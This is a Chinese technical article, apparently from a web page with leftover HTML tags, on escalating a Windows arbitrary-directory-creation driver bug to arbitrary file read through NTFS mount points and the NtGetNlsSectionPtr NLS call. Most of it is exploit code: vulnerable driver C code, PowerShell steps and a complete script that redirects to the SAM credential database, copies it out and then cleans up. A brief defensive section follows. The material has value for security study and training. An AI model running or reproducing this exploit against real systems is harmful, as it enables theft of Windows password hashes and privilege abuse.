Windows利用技巧：从任意目录创建到任意文件读取<\/h1>

1. 技术背景<\/h2>
本技术演示了如何利用Windows系统中的任意目录创建漏洞，通过NTFS挂载点和NLS（国际语言支持）系统调用，最终实现任意文件读取的能力。这不是一个特定的漏洞，而是一种利用技巧，适用于存在任意目录创建漏洞的场景。<\/p>

2. 核心原理<\/h2>

2.1 任意目录创建漏洞<\/h3>
在Windows内核API中，文件和目录的创建都通过ZwCreateFile<\/code>系统调用完成，区别在于CreateOptions<\/code>参数：<\/p>

FILE_DIRECTORY_FILE<\/code>：创建目录<\/li>
FILE_NON_DIRECTORY_FILE<\/code>：创建文件<\/li>
<\/ul>
漏洞示例代码：<\/p>
NTSTATUS KernelCreateDirectory<\/span>(PHANDLE Handle, PUNICODE_STRING Path) {
<\/span><\/span>    IO_STATUS_BLOCK io_status =<\/span> { 0<\/span> };
<\/span><\/span>    OBJECT_ATTRIBUTES obj_attr =<\/span> { 0<\/span> };
<\/span><\/span>    InitializeObjectAttributes(&<\/span>obj_attr, Path, OBJ_CASE_INSENSITIVE |<\/span> OBJ_KERNEL_HANDLE);
<\/span><\/span>    return<\/span> ZwCreateFile(Handle, MAXIMUM_ALLOWED, &<\/span>obj_attr, &<\/span>io_status, 
<\/span><\/span>                       NULL, FILE_ATTRIBUTE_NORMAL, 
<\/span><\/span>                       FILE_SHARE_READ |<\/span> FILE_SHARE_DELETE, 
<\/span><\/span>                       FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/p>

使用FILE_DIRECTORY_FILE<\/code>标志<\/li>
使用FILE_OPEN_IF<\/code>作为Disposition参数（不存在则创建，存在则打开）<\/li>
调用Zw<\/code>函数（内核权限运行，禁用访问检查）<\/li>
未设置OBJ_FORCE_ACCESS_CHECK<\/code>标志<\/li>
<\/ol>
2.2 NTFS挂载点（Junction Points）<\/h3>
NTFS挂载点通过$REPARSE_POINT<\/code>属性存储目标路径。关键特性：<\/p>

可以重定向到文件（而不仅仅是目录）<\/li>
当不指定FILE_DIRECTORY_FILE<\/code>或FILE_NON_DIRECTORY_FILE<\/code>标志时，可以成功重定向到文件<\/li>
<\/ul>
2.3 NLS系统调用<\/h3>
NtGetNlsSectionPtr<\/code>系统调用用于映射代码页文件到内存：<\/p>

首先尝试在\NLS<\/code>目录下打开命名节对象<\/li>
如果不存在，则打开对应的.nls<\/code>文件并创建节对象<\/li>
最后映射节对象到内存<\/li>
<\/ol>
关键漏洞点：<\/p>

使用ZwOpenFile<\/code>时不设置OBJ_FORCE_ACCESS_CHECK<\/code><\/li>
ZwOpenFile<\/code>的最后一个参数为0（不设置文件\/目录标志）<\/li>
文件路径格式为\SystemRoot\System32\c_<NUM>.nls<\/code><\/li>
<\/ul>
3. 利用步骤<\/h2>
3.1 创建任意目录<\/h3>

通过驱动程序的IOCTL接口创建目录<\/li>
目录路径格式：\SystemRoot\system32\c_<NUM>.nls<\/code>（如1337）<\/li>
<\/ol>
PowerShell示例：<\/p>
Import-Module NtObjectManager
<\/span><\/span>
<\/span><\/span>function<\/span> Get-DriverIoCtl {
<\/span><\/span>    Param<\/span>([int]<\/span>$ControlCode)
<\/span><\/span>    [NtApiDotNet.NtIoControlCode]<\/span>::new("Unknown"<\/span>, 0x800 -bor<\/span> $ControlCode, "Buffered"<\/span>, "Any"<\/span>)
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> New-Directory {
<\/span><\/span>    Param<\/span>([string]<\/span>$Filename)
<\/span><\/span>    Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
<\/span><\/span>        $ioctl = Get-DriverIoCtl -ControlCode 2
<\/span><\/span>        $nt_filename = [NtApiDotNet.NtFileUtils]<\/span>::DosFileNameToNt($Filename)
<\/span><\/span>        $bytes = [Text.Encoding]<\/span>::Unicode.GetBytes($nt_filename)
<\/span><\/span>        $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$dir = "\SystemRoot\system32\c_1337.nls"<\/span>
<\/span><\/span>New-Directory $dir
<\/span><\/span><\/code><\/pre>3.2 设置挂载点<\/h3>
将创建的目录设置为指向目标文件的挂载点：<\/p>
$target_path = "\SystemRoot\system32\config\SAM"<\/span>
<\/span><\/span>Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile) {
<\/span><\/span>    $file.SetMountPoint($target_path, $target_path)
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3 触发文件读取<\/h3>
通过NtGetNlsSectionPtr<\/code>系统调用读取文件：<\/p>
Use-NtObject($map = [NtApiDotNet.NtLocale]<\/span>::GetNlsSectionPtr("CodePage"<\/span>, 1337)) {
<\/span><\/span>    Use-NtObject($output = [IO.File]<\/span>::OpenWrite("sam.bin"<\/span>)) {
<\/span><\/span>        $map.GetStream().CopyTo($output)
<\/span><\/span>        Write-Host "Copied file"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.4 清理<\/h3>
删除创建的目录和节对象：<\/p>
# 删除目录<\/span>
<\/span><\/span>Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile -Access Delete) {
<\/span><\/span>    $file.Delete()
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span># 删除节对象<\/span>
<\/span><\/span>Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 -Access Delete) {
<\/span><\/span>    $sect.MakeTemporary()
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 技术细节<\/h2>
4.1 绕过文件共享限制<\/h3>
关键点：<\/p>

NtGetNlsSectionPtr<\/code>只请求SYNCHRONIZE<\/code>访问权限<\/li>
文件共享检查不考虑SYNCHRONIZE<\/code>权限<\/li>
内核中的ZwCreateSection<\/code>不检查句柄的读取权限<\/li>
因此可以读取被独占锁定的文件（如SAM）<\/li>
<\/ul>
4.2 路径处理<\/h3>

使用\SystemRoot<\/code>而非驱动器号，避免重定向问题<\/li>
代码页文件路径格式固定：\SystemRoot\System32\c_<NUM>.nls<\/code><\/li>
数字代码页应选择未使用的值（如1337）<\/li>
<\/ul>
5. 防御措施<\/h2>


驱动程序开发：<\/p>

使用OBJ_FORCE_ACCESS_CHECK<\/code>标志<\/li>
限制目录创建位置<\/li>
验证输入路径<\/li>
<\/ul>
<\/li>

系统加固：<\/p>

限制对\SystemRoot\System32<\/code>的写权限<\/li>
监控异常的目录创建操作<\/li>
限制对NLS系统调用的访问<\/li>
<\/ul>
<\/li>

检测：<\/p>

监控异常的挂载点创建<\/li>
检查对敏感文件（如SAM）的异常访问尝试<\/li>
<\/ul>
<\/li>
<\/ol>
6. 完整利用脚本<\/h2>
# 完整利用脚本<\/span>
<\/span><\/span>Import-Module NtObjectManager
<\/span><\/span>
<\/span><\/span># 1. 创建目录<\/span>
<\/span><\/span>$dir = "\SystemRoot\system32\c_1337.nls"<\/span>
<\/span><\/span>New-Directory $dir
<\/span><\/span>
<\/span><\/span># 2. 设置挂载点<\/span>
<\/span><\/span>$target_path = "\SystemRoot\system32\config\SAM"<\/span>
<\/span><\/span>Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile) {
<\/span><\/span>    $file.SetMountPoint($target_path, $target_path)
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span># 3. 触发文件读取<\/span>
<\/span><\/span>Use-NtObject($map = [NtApiDotNet.NtLocale]<\/span>::GetNlsSectionPtr("CodePage"<\/span>, 1337)) {
<\/span><\/span>    Use-NtObject($output = [IO.File]<\/span>::OpenWrite("sam.bin"<\/span>)) {
<\/span><\/span>        $map.GetStream().CopyTo($output)
<\/span><\/span>        Write-Host "SAM文件已复制到sam.bin"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span># 4. 清理<\/span>
<\/span><\/span>Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile -Access Delete) {
<\/span><\/span>    $file.Delete()
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 -Access Delete) {
<\/span><\/span>    $sect.MakeTemporary()
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>7. 总结<\/h2>
本技术展示了如何将看似无害的任意目录创建漏洞升级为任意文件读取能力，关键在于：<\/p>

利用NTFS挂载点重定向到文件<\/li>
利用NLS系统调用的特殊行为绕过文件共享限制<\/li>
精心构造路径和访问方式实现目标<\/li>
<\/ol>
这种技术适用于Windows 7及更高版本，是一种强大的后利用技术，特别是在渗透测试和红队评估中。防御此类攻击需要多层次的防护措施，包括适当的权限管理、输入验证和系统监控。<\/p>